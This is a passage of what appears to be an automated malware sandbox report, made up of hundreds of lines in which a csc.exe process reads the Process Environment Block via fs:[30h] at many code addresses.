Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E59C mov eax, dword ptr fs:[00000030h]	6_2_0599E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994588 mov eax, dword ptr fs:[00000030h]	6_2_05994588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov eax, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov ecx, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F5BE mov eax, dword ptr fs:[00000030h]	6_2_05A1F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059895DA mov eax, dword ptr fs:[00000030h]	6_2_059895DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059665D0 mov eax, dword ptr fs:[00000030h]	6_2_059665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov eax, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059955C0 mov eax, dword ptr fs:[00000030h]	6_2_059955C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A355C9 mov eax, dword ptr fs:[00000030h]	6_2_05A355C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059625E0 mov eax, dword ptr fs:[00000030h]	6_2_059625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1B52F mov eax, dword ptr fs:[00000030h]	6_2_05A1B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35537 mov eax, dword ptr fs:[00000030h]	6_2_05A35537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov eax, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov ecx, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6500 mov eax, dword ptr fs:[00000030h]	6_2_059F6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B562 mov eax, dword ptr fs:[00000030h]	6_2_0595B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B480 mov eax, dword ptr fs:[00000030h]	6_2_0595B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059934B0 mov eax, dword ptr fs:[00000030h]	6_2_059934B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059944B0 mov ecx, dword ptr fs:[00000030h]	6_2_059944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EA4B0 mov eax, dword ptr fs:[00000030h]	6_2_059EA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059664AB mov eax, dword ptr fs:[00000030h]	6_2_059664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A094E0 mov eax, dword ptr fs:[00000030h]	6_2_05A094E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059604E5 mov ecx, dword ptr fs:[00000030h]	6_2_059604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A354DB mov eax, dword ptr fs:[00000030h]	6_2_05A354DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E7410 mov eax, dword ptr fs:[00000030h]	6_2_059E7410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598340D mov eax, dword ptr fs:[00000030h]	6_2_0598340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A430 mov eax, dword ptr fs:[00000030h]	6_2_0599A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C427 mov eax, dword ptr fs:[00000030h]	6_2_0595C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598245A mov eax, dword ptr fs:[00000030h]	6_2_0598245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595645D mov eax, dword ptr fs:[00000030h]	6_2_0595645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3547F mov eax, dword ptr fs:[00000030h]	6_2_05A3547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F453 mov eax, dword ptr fs:[00000030h]	6_2_05A1F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EC460 mov ecx, dword ptr fs:[00000030h]	6_2_059EC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A337B6 mov eax, dword ptr fs:[00000030h]	6_2_05A337B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D7B0 mov eax, dword ptr fs:[00000030h]	6_2_0598D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F78A mov eax, dword ptr fs:[00000030h]	6_2_05A1F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
